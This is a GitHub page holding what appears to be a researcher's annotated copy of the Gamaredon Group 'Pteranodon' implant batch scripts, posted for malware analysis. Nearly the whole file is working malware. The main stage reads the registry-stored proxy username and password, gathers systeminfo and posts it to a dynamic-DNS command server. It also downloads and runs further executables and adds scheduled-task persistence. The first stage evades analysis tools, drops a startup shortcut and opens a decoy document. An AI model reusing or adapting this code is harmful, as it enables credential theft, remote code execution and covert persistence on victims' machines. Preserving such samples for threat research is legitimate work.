Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Malware-Misc-RE/2019-04-13-Gamaredon-Group-Pteranodon-Implant-Gamaredon Group Pteranodon Implant-Ver-arm_11.04.cmd

Go to file
 
 
Cannot retrieve contributors at this time
185 lines (176 sloc) 6.38 KB
Raw Blame
Open in GitHub Desktop
REM @VK_INTEL
REM Gamaredon Group Pteranodon Implant Ver "arm_11.04"
REM MD5: 49cde7d0ca755f0c284d9690e84711ac
REM MAIN .cmd GAMAREDON GROUP
@echo off
set OCXkMSu=%random%*qBKBDuY
chcp 1251>NUL
set OCXkMSu=%random%*qBKBDuY
setlocal enabledelayedexpansion
set OCXkMSu=%random%*qBKBDuY
set "SAcJRNH=HKCU\Software"
set OCXkMSu=%random%*qBKBDuY
set "TSaGECa=Microsoft\Windows"
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
set "tKAJClI=CurrentVersion\Internet Settings"
set OCXkMSu=%random%*qBKBDuY
set vJWOqeJ="%SAcJRNH%\%TSaGECa%\%tKAJClI%"
set OCXkMSu=%random%*qBKBDuY
For /F "UseBackQ Tokens=2*" %%a In (`Reg.exe Query %vJWOqeJ%^|Find /I "ProxyServer"`) do set HIEqpGt=%%b
set OCXkMSu=%random%*qBKBDuY
For /F "UseBackQ Tokens=2*" %%s In (`Reg.exe Query %vJWOqeJ%^|Find /I "ProxyUser"`) do set OPkMxWO=%%t
set OCXkMSu=%random%*qBKBDuY
For /F "UseBackQ Tokens=2*" %%t In (`Reg.exe Query %vJWOqeJ%^|Find /I "ProxyPass"`) do set cKIlfDD=%%u
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
For /F "skip=1 Tokens=4*" %%s In ('vol c:') Do set zbjxUmC=%%s
if %zbjxUmC%==is (
For /F "skip=1 Tokens=5*" %%t In ('vol c:') Do set zbjxUmC=%%t
)
set OCXkMSu=%random%*qBKBDuY
set wSGVlRE=arm_11.04 REM VERSION arm_11.04
set OCXkMSu=%random%*qBKBDuY
set BGZWoiS=0
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
systeminfo > lqBFmcw
set OCXkMSu=%random%*qBKBDuY
FOR /F "tokens=*" %%a IN (lqBFmcw) do @IF NOT i%%a==i set KodJXXa=!KodJXXa!%%a+###
If lfAjVRt==x86 Set WrWCYaC=x64
set PMjwyhB=%computername%_%zbjxUmC:-=%
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
set FQXAWoz=http REM URL http://winroutes.dddns.net
set OCXkMSu=%random%*qBKBDuY
set EsCAJqG=winrouts
set OCXkMSu=%random%*qBKBDuY
set DHpcPVP=ddns.net
If lfAjVRt==x86 Set WrWCYaC=x64
set OjODhgJ=%FQXAWoz%://%EsCAJqG%.%DHpcPVP%
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
set CMLoZoy=richtime
set OCXkMSu=%random%*qBKBDuY
set "CEDGOdz=%APPDATA%\Microsoft\IE"
set OCXkMSu=%random%*qBKBDuY
set XnYEPFS=MicrosoftCreate
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
set FDcBWfh=ie_cash
If lfAjVRt==x86 Set WrWCYaC=x64
set ncClIKV=setup
set OCXkMSu=%random%*qBKBDuY
set BJZvOCP=bitwork
set per_23="Mozilla/5.0 (Linux; Android 5.1; Neffos C5 Build/LMY47D) Mobile Safari/537.36"
set OCXkMSu=%random%*qBKBDuY
MD "%CEDGOdz%"
If lfAjVRt==x86 Set WrWCYaC=x64
copy "%XnYEPFS%.exe" "%CEDGOdz%\%FDcBWfh%.exe" /y
set OCXkMSu=%random%*qBKBDuY
schtasks /Create /SC MINUTE /MO 30 /F /tn %FDcBWfh%_%zbjxUmC:-=%_01 /tr "%CEDGOdz%\%FDcBWfh%.exe -b -c -t 5 '%FQXAWoz%://%BJZvOCP%.%DHpcPVP%/%PMjwyhB%/%ncClIKV%.exe' -P '%USERPROFILE%'"
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
schtasks /Create /SC MINUTE /MO 32 /F /tn %FDcBWfh%_%zbjxUmC:-=%_02 /tr "%USERPROFILE%\%ncClIKV%.exe"
If lfAjVRt==x86 Set WrWCYaC=x64
if defined HIEqpGt (
schtasks /Create /SC MINUTE /MO 31 /F /tn %FDcBWfh%_%zbjxUmC:-=%_03 /tr "%CEDGOdz%\%FDcBWfh%.exe -e http_proxy=http://%HIEqpGt% --proxy-user=%OPkMxWO% --proxy-password=%cKIlfDD% -b -c -t 3 '%FQXAWoz%://%BJZvOCP%.%DHpcPVP%/%PMjwyhB%/%ncClIKV%.exe' -P '%USERPROFILE%'"
)
set OCXkMSu=%random%*qBKBDuY
:stBFkIN
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
set /a uzlhpGg=37*%RANDOM%/32768
If lfAjVRt==x86 Set WrWCYaC=x64
set OCXkMSu=%random%*qBKBDuY
ping -n 8 8.8.8.8
set OCXkMSu=%random%*qBKBDuY
timeout /t %uzlhpGg%
set OCXkMSu=%random%*qBKBDuY
taskkill /f /im %XnYEPFS%.exe
set OCXkMSu=%random%*qBKBDuY
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
%XnYEPFS%.exe --user-agent=%per_23% --post-data="versiya=%wSGVlRE: =%&comp=%computername%&id=%PMjwyhB: =%&sysinfo=%KodJXXa%" "%OjODhgJ%" -q -N %OjODhgJ% -O %CMLoZoy%.exe
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
if defined HIEqpGt (
%XnYEPFS%.exe --user-agent=%per_23% -e http_proxy=http://%HIEqpGt% --proxy-user=%OPkMxWO% --proxy-password=%cKIlfDD% --post-data="versiya=%wSGVlRE: =%&comp=%computername%&id=%PMjwyhB: =%&sysinfo=%KodJXXa%" "%OjODhgJ%" -q -N %OjODhgJ% -O %CMLoZoy%.exe
)
timeout /T 5
If lfAjVRt==x86 Set WrWCYaC=x64
set /a RjMaKPC=0
set OCXkMSu=%random%*qBKBDuY
for %%b in (%CMLoZoy%.exe) do (set /a RjMaKPC=%%~Zb)
set OCXkMSu=%random%*qBKBDuY
if %RjMaKPC% GEQ 50002 call :rDEwHEx
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
set /a uzlhpGg=32*%RANDOM%/32768
set OCXkMSu=%random%*qBKBDuY
timeout /t %uzlhpGg%
If lfAjVRt==x86 Set WrWCYaC=x64
ping -n 7 8.8.8.8
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
set OCXkMSu=%random%*qBKBDuY
goto stBFkIN
:rDEwHEx
start "" "%CMLoZoy%.exe"
set OCXkMSu=%random%*qBKBDuY
ping -n 11 google.com
set OCXkMSu=%random%*qBKBDuY
del /q /f "%CMLoZoy%.exe"
set OCXkMSu=%random%*qBKBDuY
exit /b
REM FIRST-STAGE .cmd
@echo off
if lfAjVRt==zpgpDXv set lfAjVRt=%random%*OCXkMSu-qBKBDuY
For %%c In (wireshark procexp) do (
TaskList /FI "ImageName EQ %%c.exe" | Find /I "%%c.exe"
)
If %ErrorLevel% NEQ 1 goto exit
set OCXkMSu=%random%*qBKBDuY
set lfAjVRt=WrWCYaC+qBKBDuY
set "zbjxUmC=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
set OCXkMSu=%random%*qBKBDuY
set "wSGVlRE=%USERPROFILE%"
If lfAjVRt==x86 Set WrWCYaC=x64
set lqBFmcw=winsetup
if lfAjVRt==zpgpDXv set lfAjVRt=%random%*OCXkMSu-qBKBDuY
If lfAjVRt==x86 Set WrWCYaC=x64
set "KodJXXa=Document"
set lfAjVRt=WrWCYaC+qBKBDuY
set PMjwyhB=%lqBFmcw%.lnk
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
set lfAjVRt=WrWCYaC+qBKBDuY
set EsCAJqG=14787
If lfAjVRt==x86 Set WrWCYaC=x64
set OjODhgJ=6120
set CMLoZoy=19317
set OCXkMSu=%random%*qBKBDuY
set CEDGOdz=dcthfdyjdfcdst,tv
If lfAjVRt==x86 Set WrWCYaC=x64
set lfAjVRt=WrWCYaC+qBKBDuY
taskkill /f /im %lqBFmcw%.exe
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
RENAME "%CMLoZoy%" %CMLoZoy%.exe
if lfAjVRt==zpgpDXv set lfAjVRt=%random%*OCXkMSu-qBKBDuY
%CMLoZoy%.exe "-p%CEDGOdz%
If lfAjVRt==x86 Set WrWCYaC=x64
copy /y "%lqBFmcw%" "%wSGVlRE%\%lqBFmcw%.exe"
set lfAjVRt=WrWCYaC+qBKBDuY
if exist "%wSGVlRE%\%lqBFmcw%.exe" call :dsGfcXj
set OCXkMSu=%random%*qBKBDuY
if not exist "%wSGVlRE%\%lqBFmcw%.exe" call :stBFkIN
if lfAjVRt==zpgpDXv set lfAjVRt=%random%*OCXkMSu-qBKBDuY
RENAME "%EsCAJqG%" %PMjwyhB%
set lfAjVRt=WrWCYaC+qBKBDuY
copy "%PMjwyhB%" "%zbjxUmC%" /y
If lfAjVRt==x86 Set WrWCYaC=x64
RENAME "%OjODhgJ%" "%KodJXXa%.docx"
set lfAjVRt=WrWCYaC+qBKBDuY
"%CD%\%KodJXXa%.docx"
if lfAjVRt==zpgpDXv set lfAjVRt=%random%*OCXkMSu-qBKBDuY
exit /b
:dsGfcXj
set lfAjVRt=WrWCYaC+qBKBDuY
start "" "%wSGVlRE%\%lqBFmcw%.exe"
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
exit /b
:stBFkIN
if lfAjVRt==zpgpDXv set lfAjVRt=%random%*OCXkMSu-qBKBDuY
RENAME "%lqBFmcw%" %lqBFmcw%.exe
::6
start "" "%lqBFmcw%.exe"
set OCXkMSu=%random%*qBKBDuY
exit /b